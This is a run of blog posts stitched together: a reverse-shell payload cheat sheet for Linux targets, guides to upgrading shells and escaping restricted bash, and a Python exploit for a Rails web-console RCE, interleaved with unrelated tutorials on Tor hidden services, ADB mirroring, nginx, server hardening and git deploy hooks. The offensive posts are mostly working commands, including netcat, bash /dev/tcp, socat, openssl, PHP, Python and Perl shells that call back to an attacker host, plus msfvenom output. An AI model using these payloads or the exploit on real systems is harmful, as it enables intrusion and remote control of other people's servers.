Hello and welcome again! In this post I'd love to share to you my small knowledge on reverse shells specifically on linux target. I'm not here to talking about exploitation techniques or shellcoding. If you intersted to know, I'll make other post specifically on the particular topics.

This post I made my best to be easy to understand for beginners. These also requires you to understand networking client/server model. These process are just like a very basic client server model where there is a listener (server) where it listen on incoming connections and the client where it perform a connection to the server.

What is reverse shell?

Reverse shell or often called connect-back shell is remote shell introduced from the target by connecting back to the attacker machine and spawning target shell on the attacker machine. This usually used during exploitation process to gain control of the remote machine.

When to use reverse shell?

Reverse shell usually used when the target machine is blocking incoming connection from certain port by active firewall. To bypass this firewall restriction, people use reverse shell so that let the remote target connect back to us and spawning their shell instead of we connect to them and they spawn their shell to us (bind shell).

Caveats:

This exposes the control server of the attacker and traces might pickup by network security monitoring services of target network.

Some mitigation might helps bypassing those neglect and/or makes certain programs/investigation harder to traces back to control server. Interested? read more here.

In this post, I'll be sharing a simple way for understanding purposes and showing you more my reverse shell code collection.

Getting reverse shell

Usually when attacker successfully exploiting target with code execution, we usually want to take the channel and operate post exploitation under a shell terminal as it much easier.

There are three steps in order to get a reverse shell.

1. Exploiting a vulnerability on target system/network with the ability to perform a code execution.
2. Setting up a listener.
3. Injecting reverse shell code on vulnerable system to exploit the vulnerabilty.

There are plenty ways/payload to get a reverse shell, the simplest that I like to use is by using netcat command but first, read through the pages carefully.

1. Exploiting a vulnerability

This step I won't tell you much in this post but the idea is to find a vulnerability that can be leverage to perform a code execution. Once you find the code execution vulnerability, then is only you can leverage the exploit and gain a shell in this case a reverse shell.

In my list of reverse shell payloads below, there are many difference use cases for each payloads, the reasons are because of different platform understand its own "language", runs on its own "platform" and "architecture" etcetra.

For example, a vulnerable PHP application that runs on Linux server are only going to work with PHP payloads not python or jsp.

The payloads are also runs on a context of the application vulnerability. For example, PHP application that runs on a linux server has a command injection vulnerability. Depending on the server behavior, a linux command injection reverse shell payload might be doable in most cases.

2. Setting up a listener

First, always set up your listener!

First you need to set up listener on your attacking machine to be able the victim connect back to you and spawning their shell.

Note: About choosing a listener port, well yes it can be anything as long as the port is not blocked by their outgoing firewall. Some server block all outgoing port except 80 or 443 so that the server can make a web request. Thus, you need to set a listener on allowed outgoing port. Further investigation required to avoid any suspicious activity on target network.

In this example, the victim allow outgoing port on any port (default iptables firewall rule). So we use 4444 as a listener port. Change it to your preferable port you like. Listener could be any program/utility that can open TCP/UDP connections or sockets. In our case I would like to use nc or netcat utility.

$ nc -lvp 4444

This command tells netcat to -l listen with -v verbose output on -p port 4444 on every interface. Through out this post, I'll make a placeholder <LHOST> which refers to your attacking machine IP and <LPORT> refers to your listener port. Replace it with yours respectively.

3. Connect back system shell to your listener

And on the target server where the code execution lies, you need to run a connect back system command to your attacking machine. As example, I use netcat command and execute /bin/sh.

Note: This is a simple example where the target is a linux machine and gets system code execution. And also has the command nc with -e support (usually have on older system).

This can be done using the following commands:

$ nc -e /bin/sh 192.168.1.10 4444

Where 192.168.1.10 is your attacking IP and 4444 is your listening port. After a few seconds, you should get victim shell on your terminal where you listen.

nc -lvp 4444
Listening on [0.0.0.0] (family 2, port 4444)
Connection from victimip 39540 received!
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

To testing on your own without the vulnerable application, you can just run the command on your linux box with the LHOST would be 127.0.0.1 and another terminal would be your listener.

Other reverse shell payloads

1. Using socat to get a reverse shell.
Socat is also a popular utility/program other than netcat but usually not installed by default on most linux servers. If the target server has socat installed, you can use the following commands and get a tty shell directly without needing to upgrade it.
Listener:

socat -,raw,echo=0 tcp-listen:<LPORT>

victim:

socat tcp:<LHOST>:<LPORT> exec:"bash -i",pty,stderr,setsid,sigint,sane

2. Creates a semi-interactive shell via GNU AWK.
This spawn /bin/sh and creates two way communication stdin and stdout and close socket on CTRL+C or exit. This does not support stderr. If stderr, it will seen on victim.

awk 'BEGIN{s="/inet/tcp/0/<LHOST>/<LPORT>";while(1){if((s|&getline c)<0||c=="exit")break;while(c&&(c|&getline)>0)print$0|&s;close(c)}}'

3. Creates a semi-interactive shell via bash's builtin /dev/tcp.
This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.

bash -c '0<&60-;exec 60<>/dev/tcp/<LHOST>/<LPORT>;sh <&60 >&60 2>&60' 2> /dev/null

Another bash reverse shell.

bash -c 'sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'

4. Creates a semi-interactive shell via netcat
Newer linux machine by default has traditional netcat with GAPING_SECURITY_HOLE disabled. When the GAPING_SECURITY_HOLE is disabled, it means you don't have the '-e' option of netcat, which will execute specified command after a connection has been established.

Well this just isn't necessary. The following tricks creates a FIFO named pipes file system object and use it as a backpipe stdin for the netcat command while the pipes relay stdout and stderr from /bin/sh command. This is beautiful! Then the rm command will remove the named pipe automatically when the connection is terminated.

mkfifo /tmp/p; nc <LHOST> <LPORT> 0</tmp/p | /bin/sh > /tmp/p 2>&1; rm /tmp/p

Below payloads are also same but with using mknod to make the FIFO named pipe. Both telnet and netcat works well in this case.

mknod /tmp/b p && nc <LHOST> <LPORT> 0</tmp/b | /bin/sh > /tmp/b 2>&1;rm /tmp/b

mknod /tmp/j p && telnet <LHOST> <LPORT> 0</tmp/j | /bin/sh > /tmp/j 2>&1;rm /tmp/j

Old netcat with -e enabled allows direct command execution after establishing sockets. The command must be specified as a full pathname.

nc -e /bin/sh <LHOST> <LPORT>

5. Creates a semi-interactive shell via openssl
Encrypted reverse shell connection might help manual/automatic detection by a network security monitoring tools on the target network harder and sometimes could even bypass the IDS.

In order to use SSL in your reverse shell, first you need to generate a SSL certificate for the tunnel.
Generate SSL certificate:

openssl req -x509 -quiet -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Start SSL listener using openssl utility.

openssl s_server -quiet -key key.pem -cert cert.pem -port <LPORT>

Run the payload on victim using openssl client.

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <LHOST>:<LPORT> > /tmp/s 2> /dev/null; rm /tmp/s

6. PHP reverse shell
Simple PHP reverse shell that use exec() function to execute system command. If exec() function is disabled. You can try other PHP function that can execute system command such as system().

php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'

7. Python Reverse shell
Creates a semi-interactive shell using python.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

8. Perl Rev shell
Creates a semi-interactive shell using perl.

perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Build in Kali Linux web shells

Kali Linux has common webshells you can use without finding online in /usr/share/webshells. Select appropriate webshell based on your target platform, modify the LHOST and LPORT and upload it on the target system.

$ ls /usr/share/webshells

Advance: Generate custom reverse shell using msfvenom from Metasploit

Most of the reverse shell you see here you can also get it within Metasploit msfvenom 😛. Thus eliminate the needed to searching reverse shell payload online.

List available payloads

msfvenom -l payloads | grep "cmd/unix/reverse"

Any of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT). For example, here's a netcat command not requiring the -e flag:

Generate shell via msfvenom

$ msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.1.112 LPORT=4545 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 103 bytes
mkfifo /tmp/zcjvnno; nc 192.168.1.112 4545 0</tmp/zcjvnno | /bin/sh >/tmp/zcjvnno 2>&1; rm /tmp/zcjvnno

And here's an example Perl oneliner in case netcat isn't installed:

$ msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.112 LPORT=4545 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 232 bytes
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.112:4545");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

Next level!

Congratulation on having a reverse shell on your target. Next step that I would recommend is to spawning a real tty shell to complete control over your shell session.

How do you think my post here? Let me know down in the comment section below and If you have any question, or something unclear don't hesitate to ping me in the comment. Good luck and stay ethical.

Hello guys, in this post we will take a look overview about Tor network and learn how to setup your own hidden service(s) from scratch where we also install nginx as prefered web server. If you already has a website running, skip installing nginx, and skip the web server configuration.

What is Tor

Tor or The Onion Routing is a network that has multiple transport encryption that bounce through multiple anonymous relay to your request server. This enchance the anonymity of the user when browsing using Tor.

What about Tor Hidden Service?

Tor hidden service or most people called "darkweb" or "darknet" or what ever they called it is a web services that serves within the tor network and has .onion extension tld. This URL can only be connected within the tor network itself.

Prerequisite

You'll need a web server to host your dark web hidden service. If you don't have a web server, consider using my referral link DigitalOcean. Sign up using that link will grant you 50$ free credit on sign up which can be use for 30 days for free. Enjoy!

Setup

1. Go to your remote server, and install nginx and tor packages.

$ sudo apt install tor nginx -y

1. Setting up Nginx

Nginx enabled site configuration file available at /etc/nginx/sites-enabled/*.conf . Whatever config in this folder will be included in nginx.conf.

What is important in this nginx configuration is that to make sure your website is on the right web root (e.g. `/var/www/html/index.html), and the listing port is correct. If you can access the webpage on your browser. you're good to go.

If you have an web application running on different port (not nginx service) this is also fine, you can just use Tor to redirect the traffic to your local listening service port.

2. Setting up Tor

1. Edit the torrc configs

$ sudo nano /etc/tor/torrc

2. Find the section where it says "This section is just for location-hidden services". We are going to edit some configs to enable the hidden service.

Uncomment both these:

HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:80

The HiddenServiceDir is where your hidden service (your website) located. The HiddenServicePort is where the connection from outsite connects to your hidden service through port 80 and specify the address to your web by changing the 127.0.0.1:80 with [localhost]:[your-webserver-listener-port]

HiddenServicePort x y:z says to redirect requests on port x to the
address y:z.

Change the config to:

HiddenServiceDir /var/lib/tor/[hidden-service-name]/
HiddenServicePort 80 127.0.0.1:80

The hidden service name can be anything such as "myblog" or whatever.

If you have another hidden services just uncomment below config to enable another hidden service. Note that the listening port should be different with other hidden services to avoid conflict.

Once you restart the service, the folder of the hidden service will be created for you.

$ sudo systemctl restart tor.service

3. Your hidden service is now running. To get the .onion link, go to `/var/lib/tor/[your-hidden-service]' and you'll find two files within this directory.

4. The hostname is your .onion link where you should tell everyone to visit your hidden service. If you wish to edit the hostname, don't edit the name directly as it linked to the private key. However there is a way to get your prefered onion name and will discuss in the next section.

5. The private_key is important. If you plan to keep the hidden service for a long run, you should keep it safe somewhere else.

Get custom .onion url

To get custom .onion link, you will need to use a tool such as scallion, shallot or eschalot These tool can help make .onion link customization by brute forcing hash until meet your specified regex.

Testing

To test your new hidden service, start your web server and tor service. On your host, connect to Tor network. and browse to the onion url see if you get the page of your website.

If you have any question, please let me know down in the comment section below. Thank you. Hopefully this short guide helps you successfully build your own hidden service.

Most of the time, when developer need to showcase their android apps, or mirroring their Android phone onto a screen, they usually use third party apps to do that. Did you know that you can mirror your android phone in your linux desktop through wireless ADB without relying on any third party application? Well in this post, I'll tell you how you can do that 😉.

Generally, third party application done it the best. However, in cases some of you might looking for an 'old-school' method, this could achive by connecting your android phone through adb wirelessly and pipe it through ffmpeg for image rendering.

Step 1: Install requirements

Make sure to download appropriate tools before started.

sudo apt install android-tools-adb ffmpeg

Step 2: Start the adb server

On your terminal, start the adb server.

adb start-server
* daemon not running; starting now at tcp:5037
* daemon started successfully

Step 3: Restart the adb daemon to listen on port

Connect your phone with same wifi and enable usb debugging adb over wifi.

If your android doesn't have adb over wifi feature, connect your phone to your pc wired and enable usb debugging on your Android phone. Run this command on your PC to check the connection of the ADB. A prompt on your Android phone might appears if you never done this before. Just accept the fingerprint.

adb devices
List of devices attached
b68bfcf9cbd8c2fe device

And execute this command to enable adb over network. The port can be anything. In this case, I do 5555 (by default). So what this command does is restarting your Android phone adbd daemon to listen on TCP on the specified port.

adb tcpip 5555

Now you can pull off the cable.

Step 4: Connect adb to your Android over the wifi

Check your Android IP on the network setting (or sometimes on About phone -> status -> IP address). And with the IP in mind, execute the following command on your pc to make a connection to the device via TCP/IP. Port 5555 is used by default if no port number is specified.

adb connect 192.168.1.12:5555
connected to 192.168.1.12:5555
adb devices
List of devices attached
192.168.1.12:5555	device

Now you can perform any adb command wirelessly.

Step 5: The Magic happens

The Mirror magic. Run the following command and piped the output to ffplay to render the image.

Here, you can read more about screenrecord features introduce in Android.

adb shell screenrecord --output-format=h264 - | ffplay -

Enjoy your Android screen mirror using the "old-school" method.

Some drawbacks..

• On busy wifi, speed or screen latency might lagging.
• You cannot interact with the Android using this method.
• No sound will capture.

Most of the time when we pentesting (as an example) a web application and you upload a reverse or bind shells, the shell that you get is own by the user of the running service, www-data or similar. These users are not meant to have a shell as they don't interact with the system has humans do.

The problem with non-tty-shell (and non-interactive shell) is there are certain commands and stuff that you can't do particularly ones that require pagination (less, vi) or that require additional input (su, sudo, passwd).

$ tty
  not a tty

Anyways, if you manage to get these shells (congratulation! 🎉), you can upgrade it to a tty-shell for further post exploitaion using the following methods.

1. Using python

This method is the most popular method spawning a tty shell. This requires the target server to have python (or python3) installed. Keep in mind to spawn /bin/bash instead of /bin/sh.

$ python -c "import pty;pty.spawn('/bin/bash')"

2. Using expect

Not all server have expect installed by default, however if you're lucky enough, you can use this command to spawn a tty shell.

$ expect -v
  expect version 5.45.4
  
$ cat > /tmp/shell.sh <<EOF
#!/usr/bin/expect
spawn bash
interact
EOF

$ chmod u+x /tmp/shell.sh
$ /tmp/shell.sh

3. Using socat

Socat is like netcat on steroids and is a very powerfull networking swiss-army knife. Socat can be used to pass full TTY's over TCP connections.

Again, not every server has socat installed (not installed by default). You could try to compile the binary itself or download a socat static binary.

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat
https://github.com/aledbf/socat-static-binary/releases

Anyway in this example, we are going to use socat to spawn another reverse shell with tty support. If you looking for bind shell instead, see in this post.

On the attacker machine, set up socat listener: replace 4444 with your listning port.

socat -,raw,echo=0 tcp-listen:4444

On the victim machine, connect back the attacker machine and spawn a shell. Replace <host> with attacker IP and <port> with attacker listing port.

$ socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:<host>:<port>

Check the if the shell is tty.

To check if the shell is a tty shell, simply enter tty command like below.

$ tty
/dev/pts/0

Taking it further!

Once you manage to upgrade to tty shell, you still have a limited shell (not fully interactive). You won't be able to use tab-completion and arrow keys. This is really frustrating and it can be more risky if an execution gets stuck, you can't use ctrl+c or ctrl+z without killing your session. Follow my next tutorial here on how you can upgrade the shell to fully interactive shell.

If you ever encounter with restricted shell environment (such as in CTF), this can be bypass using some of the following method. Before we get into how to bypass it, you need to identify if you're in restricted shell.

The simplest way to check if the user is in a restricted shell is by echo $SHELL variable.

echo $SHELL
/bin/rbash

You're in restricted shell if the results is like /bin/rbash and you cannot perform some basic redirections, pipes or even having a forward slash in your commands.

$ echo "breakout rbash\!" > /tmp/test
rbash: /tmp/test: restricted: cannot redirect output

1. Calling out bash as "interactive".

Check your $PATH. If /bin is in your $PATH, then you're lucky. Note: even with -i, the shell is not fully interactive. Find out here on how to upgrade to fully interactive shell.

$ /bin/bash -i
rbash: /bin/bash: restricted: cannot specify `/' in command names
$ echo $PATH
/usr/local/sbin:/sbin:/usr/sbin:/usr/bin:/bin:/usr/local/games:/usr/games

/bin in PATH so you can execute bash directly.

$ bash -i

2. Using programming language to spawn shell

Most of the time, I use Python (or python3). This also gives you tty support. In case Python is not installed, you can try other programming language to spawn a shell.

1. Use Python to spawn a shell.

$ python -c "import pty;pty.spawn('/bin/bash')"

2. Using Perl to spawn a shell.

$ perl -e 'exec "/bin/bash";'

3. Using Ruby to spawn a shell.

$ ruby -e 'exec "/bin/bash";'

4. Using PHP to spawn a shell.

$ php -r "system('/bin/bash');"

3. Invoke shells through gtfo bins.

This is very useful sources. Since the page is very well written and easy to understand and navigate, I attach the link here for our reference. It can be used to break out from restricted environments by spawning an interactive system shell from some commands. Be sure to check it out! https://gtfobins.github.io/#+shell

4. If you have the credentials ready

Sometimes when performing post exploitation, you already have the credentials of the particular user but switching to that user, resulting you getting jailed in their restricted environment. This could be bypassed by calling bash before you login(switch) to that user.

www-data@host$ su user -c "/bin/bash -i"

You can check your curent shell using the following command:

$ echo $0

If the above method successful, remember to export the proper $SHELL, $PATH env variables.

Taking it further!

After successfully breakout the restricted shells, you can now performing bash command redirection, output piping and even cd to different directories (with forward slashes).

$ echo "breakout rbash\!" > /tmp/test
$ ls -l /tmp/test
  -rw-r--r-- 1 ctf ctf 16 Apr  8 00:47 /tmp/test
$ cd /tmp
$ cat test
  breakout rbash!

In case you cannot using tab auto-completion, job controls, or using arrow keys to navigate through commands, you might want to upgrade your shell to fully interactive shell. Check out this guide I made on how you can upgrade dumb terminal to fully interactive tty shell.

Often when we get a shell by exploiting vulnerabilities, the shell that we getting is a dumb terminal or not and interactive shell. This means that you cannot ctrl+c when accidently run command such as ping where you need to terminate the process. If you do ctrl+c this not only kills the ping process, but also your shell. ¯\_(ツ)_/¯

To overcome this, I made a guide here where you can follow to convert your non-interactive shell to fully interactive shell.

Step 1

Get victim shell connection from your exploit either reverse or bind shell.

Step 2

On victim shell, upgrade the shell to tty shell. The most common is you can use python to spawn tty shell by using the pty built-in library. Make sure to spawn /bin/bash not /bin/sh. Read more here to see other methods of upgrading shell to tty shell.

$ python -c 'import pty;pty.spawn("/bin/bash")'

Step 3

Export some vars to the victim shell session. The best is to check your local terminal $TERM vars so that it same on the target terminal session.

echo $TERM
xterm-256color

Export that value on the target shell session.

export TERM=xterm-256color
export SHELL=/bin/bash

Step 4

On your local terminal, check for terminal rows and columns.

stty size
24 103

what you need to take note here is the current terminal rows and columns which is for me rows 24 and columns 103. You might be different.

On the victim shell, fork the shell to background by pressing ctrl+z and you'll bring back to your local terminal.

^Z
[1]+  Stopped        nc -lvp 9091

Execute the following command to set the terminal to echo the input characters so that it catch by the victim terminal session. Follow with the command fg to bring back the victim shell to foreground.

stty raw -echo;fg

After that, your cursor might be somewhere on the middle of the terminal, type reset to reset the victim terminal session.

stty raw -echo;fg
nc -lvp 9091
                reset

Your victim terminal is now interactive, but it is not done yet. You need to specify the "new" terminal with rows and columns to make it display properly.

stty rows 24 columns 103

Now you're happy with the fully interactive shell on victim.

This post is to get you understanding on the vulnerability and ways to exploit.

About

This exploits are in the wild and affecting all Ruby on Rails web application version 4.0.x and 4.1.x where the web console is enable which is default to development and test environment.

Vulnerability

The vulnerability relies on IP whitelist in the developer web console so that only allowed IP can view the web console.

Exploit

The exploit is to craft remote request to spoof their origin and bypassing the IP whitelist to use the web console. This cause in Remote Code Execution (RCE) to target web application. This exploit is also affect code execution on Rails 4.2.x if the attack is launched from whitelisted IP range. If the whitelisted IP is localhost, you might need to use local proxy to exploit this application.

Techniques

The example here is written in Python. When dealing with web, I like to use python requests library since it is very easy to use. The first part is to get 404 on the Rails application. This can easily be done by appending any non-existing page in the url.

#!/usr/bin/python3
import requests

url = 'http://victim.com/'
response = requests.get(url + 'non-existing-page')
print response.status_code # should be 404

If viewing on web, you should see Rails debug information if the application is in development mode. Moving on!

Next important part is to spoof the origin with X-Forwarded-For header.

The X-Forwarded-For HTTP header field is a common method for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or load balancer.
Source: Wikipedia

By setting the X-Forwarded-For header to localhost, this will spoof the server origin whitelist IP (which is allowed in localhost) and allowing us to view and use the web console.

...
header = {
    'X-Forwarded-For' : '::1'
}
response = requests.get(url + 'non-existing-page', headers=header)
...

After spoofing the origin, the console should be seen. You can type arbitary command between the backticks enclosure to run shell commands. To do this in python, you need to grab the remote console session path first. This can easily be done using python regex library.

#!/usr/bin/python3
import requests
import re

url = 'http://victim.com/'
header = {
    'X-Forwarded-For' : '::1'
}
response = requests.get(url + 'non-existing-page', headers=header)
console_remote_path = re.findall("data-remote-path='(.*)'", response.text)[0]
print console_remote_path

After getting the console_remote_path you can interact with the web console by using PUT request method inside while loop. You should now have a working python exploit script. Cheers!

...
url = url + console_remote_path
while True:
	header = {
        'X-Forwarded-For': '::1',
        'Accept': 'application/vnd.web-console.v2',
        'X-Requested-With': 'XMLHttpRequest'
	}
    
	cmd = raw_input('cmd> ')
	if cmd == 'exit' or cmd == 'quit':
		break
	elif cmd == ' ':
		continue

	cmd = '`' + cmd + '`' # Important! running shell command should be enclosed between backticks
	data = {'input': cmd}
    
	response = requests.put(url, data=data, headers=header)
	
    # beautify output
	content = response.text.split('\\n')[0:-2]
        for line in content:
            line = line.strip('\\')
            line = line.split('"', -1)[-1]
	print(line)

For further exploitation on getting a reverse shell, you should visit my other blog post specifically on reverse shell.

Exploiting using Metasploit

Using Metasploit has other advantages of managing between sessions and running modules for further exploitation.

To exploit this vulnerability using Metasploit, you can use exploit/multi/http/rails_web_console_v2_code_exec. Set RHOST and RPORT to match your victim Rails web service. Finally run exploit to start exploiting the target. Note that when using Metasploit, RHOST must be an IP address not a hostname.

This vulnerability was reported by both joernchen of Phenoelit and Ben Murphy.

Reference:
URL: https://www.cvedetails.com/cve/cve-2015-3224
URL: http://openwall.com/lists/oss-security/2015/06/16/18
URL: https://groups.google.com/forum/message/raw?msg=rubyonrails-security/lzmz9_ijUFw/HBMPi4zp5NAJ
URL: https://hackerone.com/reports/44513

Some distribution like Ubuntu use stable release from Nginx. Sometimes, if you use the default OS repositories, you cannot get the latest version from nginx. This is because Nginx has two main active branch of package release which are Mainline and Stable release. There is also another branch release which is Legacy nginx package.

Depends on the operating system, some forks on stable nginx package which minimize the potential bugs and some use bleeding edge that use the mainline nginx package to get the most out from nginx.

Mainline vs Stable release

In stable release, Nginx commits only major bug fixes and stable features correspond to that version. If new version coming out, it will come with the new stable features from the previous Mainline release.

While the mainline release is an active branch which commits many new features, major updates and bug fixes.

Version numbering

You can check if you're using mainline or stable release by issuing the following command:

$ nginx -v
nginx version: nginx/1.13.12

• The even‑numbered version (1.12) is using Nginx stable branch. This branch is updated only when critical issues or security vulnerabilities need to be fixed.
• The odd‑numbered version (1.13) is the mainline branch. This branch is actively developed; new minor releases (1.13.1, 1.13.2, etc.) are made approximately every 4 to 6 weeks, regularly introducing new features and enhancements.

As describe in Nginx blog:

We generally recommend using the mainline branch. This is where we commit all new features, performance improvements, and enhancements

How to get Nginx from the Mainline release

For this example, I'm using Ubuntu 16.04.

1. Download nginx_signing.key. This key is used by the apt program to sign the nginx package and authenticate to the nginx server repository. It is a must to prevent any warnings and errors during package installation.

$ wget https://nginx.org/keys/nginx_signing.key
$ sudo apt-key add nginx_signing.key

2. Get your Ubuntu codename. If you're using 16.04 your codename is xenial. Else, you can check that by using the command below.

$ . /etc/os-release 
$ echo $VERSION | awk -F " " '{ print tolower(substr($3,2)) }'

3. Edit /etc/apt/sources.list as sudo and add the following at the bottom of the file. Replace the codename with your codename you get from above command. You can uncomment the deb-src if you want to access the sources package.

deb http://nginx.org/packages/mainline/ubuntu/ codename nginx
# For source package access, uncomment the following line
#deb-src http://nginx.org/packages/mainline/ubuntu/ codename nginx

4. Update your package and install Nginx. Note: If you already has nginx installed, you need first to uninstall current nginx package before downloading (installing) the new one. The current package will not get automatically updated to the newer package found in nginx repository.

$ sudo apt update
$ sudo apt install nginx

Read more references here:
https://www.nginx.com/blog/nginx-1-12-1-13-released/
https://nginx.org/en/linux_packages.html

Whenever you have a remote server, there are a few configuration steps that you should take early on as part of the basic setup. This will increase the security and usability of your server and will give you a solid foundation for subsequent actions. You should do (at-least) listed things here to get ready for any application you install.

Update your server

This should be done on daily basis. Updating computer is very important as it push security updates, newer version of software on your server. apt operation must be run as root or sudo.

apt update && apt upgrade -y && apt dist-upgrade -y

This may takes some time. You can have a cup of coffee and let it run the update.

Creating new user

Create your new user by issuing the command below:

adduser userN4me --force-badname

You can add your 'username' in form of 'l337sp34k' with the option --force-badname

Sudo Privileges

Give your new user sudo privileges!

usermod -a -G sudo userN4me

-a : Will append the user with a new group sudo
-G group : Add the user to group sudo
Change to new user:

su userN4me

Public key authentication

Make ssh directory in new user account.

mkdir ~/.ssh
chmod 700 ~/.ssh

Generate ssh-keygen in local computer if you don't have ssh keys.

ssh-keygen

Assume your local PC username is localuser

ssh-keygen output
Generating public/private rsa key pair.
Enter file in which to save the key (/home/localuser/.ssh/id_rsa):

Press enter to accept the default path (or enter your new path).

Next you'll be prompted to enter a key-passphrase leave it empty. Or if you put a passphrase, you'll be prompted everytime you want to connect ssh.

Note: If you leave the passphrase blank, you will be able to use the private key for authentication without entering a passphrase. If you enter a passphrase, you will need both the private key and the passphrase to log in. Securing your keys with passphrases is more secure, but both methods have their uses and are more secure than basic password authentication.

This will generate id_rsa and id_rsa.pub in ~/.ssh directory. You will need to copy id_rsa.pub to remote server in ~/.ssh/authorized_keys

Go copy the key somewhere:

cat ~/.ssh/id_rsa.pub

In your remote server, make sure you're in the new user account. Paste the key inside ~/.ssh/authorized_keys.

nano ~/.ssh/authorized_keys

Restart ssh service

sudo service sshd restart

This is your first time entering 'sudo' command for the new user. It will prompt you to use 'sudo' wisely.

Disable SSH password authentication

This will disable password authentication when ssh-ing to your remote server. This will use public key that we generate above. This method is more secure.

sudo nano /etc/sshd/sshd_config

Uncomment below and set to 'no':

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

Find somewhere below:

PermitRootLogin no

RSAAuthentication yes
PubkeyAuthentication yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

Permit root login to no to make sure root user cannot login through ssh. Enable public key authentication to yes so that you can login to ssh passwordless and using the key that we set up earlier.

Set up firewall

I suggest to use 'ufw' as firewall. It is easy compare to iptables. However, you can still use the iptables command without conflict with ufw. But again, I suggest you to use ufw. What ever iptables commands you ufw can do. Ufw is a simpler form of iptables.

Install ufw firewall.

sudo apt install ufw

Enable ufw firewall on system startup.

sudo ufw enable
Command may disrupt existing ssh connections. Proceed with operation (y|n)? y
Firewall is active and enabled on system startup

Allow ssh in ufw. View available applications:

sudo ufw app list
Available applications:
    OpenSSH
  
sudo ufw allow OpenSSH

Reload firewall.

sudo ufw reload

Set date and timezone

Select your timezone. This will automatically update your server date and time based on choosen timezone.

# view your current date
date
Wed April 2 19:20:19 +08 2018
sudo dpkg-reconfigure tzdata
date
Thu May  3 06:00:19 +08 2018

Before start, make sure your device has a bluetooth interface or else get a cheap USB bluetooth dongle.

Install bluetooth from apt.

$ sudo apt install bluetooth

This will install bluetoothctl and bluetoothd.
Start the bluetooth service.

$ sudo service bluetooth start

$ sudo bluetoothctl
[bluetooth] agent on
[bluetooth] default-agent
[bluetooth] scan on
[bluetooth] devices
[bluetooth] pair <bluetooth_mac_address>

If you're pairing a bluetooth keyboard, it will show a key to pair the keyboard. Type that key using the bluetooth keyboard and press enter key to get paired. Finally, enter command connect to establish the connection with the bluetooth device.

[bluetooth] connect <bluetooth_mac_address>

Hello, today in this post I will show you how I deploy Git project to the production (or development) server, and push changes to them automatically through git web hook wherever I made changes through the repo. I use this method to see live changes to the project server.

To be precise, I made this Ghost theme locally and when everything is okay, I push to the server and see live changes. So that I don't need to re-upload theme whenever changes I made. If you're in similar goal to archive, you can follow the tutorial below, or else, you can alter it based on your needs.

Requirement

In order to follow this tutorial, you need a remote server available and Ghost installation ready. Make sure you install Ghost through Ghost-CLI, as it much easier to install, to troubleshoot and much more.

1. VPS DigitalOcean referral link.
2. Ghost CMS install (follow installation instruction)

• Note: My referral link grants you 50$ credits on sign up to try on and can be use up to 30 days. There is no loss or risks whatsoever.

In remote server

Login to your remote server (not root).
2. Create:

mkdir ~/deployment-folder.git
cd ~/deployment-folder.git
git init --bare
nano hooks/post-receive
chmod +x hooks/post-receive

Add the following in ~/deployment-folder.git/hooks/post-receive

#!/bin/bash
TARGET="/var/www/ghost/content/themes/mythemes" # deploy-folder
GIT_DIR="/home/user/deployment-folder.git"
BRANCH="master"

while read oldrev newrev ref
do
        # only checking out the master (or whatever branch you would like to deploy)
        if [[ $ref = refs/heads/$BRANCH ]];
        then
                echo "[+] Ref $ref received. Deploying ${BRANCH} branch to production..."
                sudo git --work-tree=$TARGET --git-dir=$GIT_DIR checkout -f
		echo "[+] Initializing folder .."
		sudo chown -R ghost:ghost $TARGET
		sudo chmod 755 $TARGET
		echo "[+] Restarting ghost service"
		cd /var/www/ghost ; ghost restart
        else
                echo "[-] Ref $ref received. Doing nothing: only the ${BRANCH} branch may be deployed on this server."
        fi
done

In local machine

1. In your repository:
   Change directory to git project folder:

cd mythemes

To set a new remote. In this case remote called as 'production' you can change to whatever you want.

git remote add production user@myserver:/home/user/deployment-folder.git
git checkout master
git push origin master # push to github
git push production master # push to server

To view (verify) remote:

git remote -v

On push to remote production, everything will automate and make changes to Ghost theme on web server.

Note: You might want to consider using OpenSSL for file encryption instead. Please see this post.

In this post we will see how to use GnuPG to make a simple symmetric encryption and decryption. This method applies to encrypt a file so that it is unreadable.

GPG supports 11 cipher algorithms that you can use:

• IDEA
• 3DES
• CAST5
• BLOWFISH
• AES
• AES192
• AES256
• TWOFISH
• CAMELLIA128
• CAMELLIA192
• CAMELLIA256

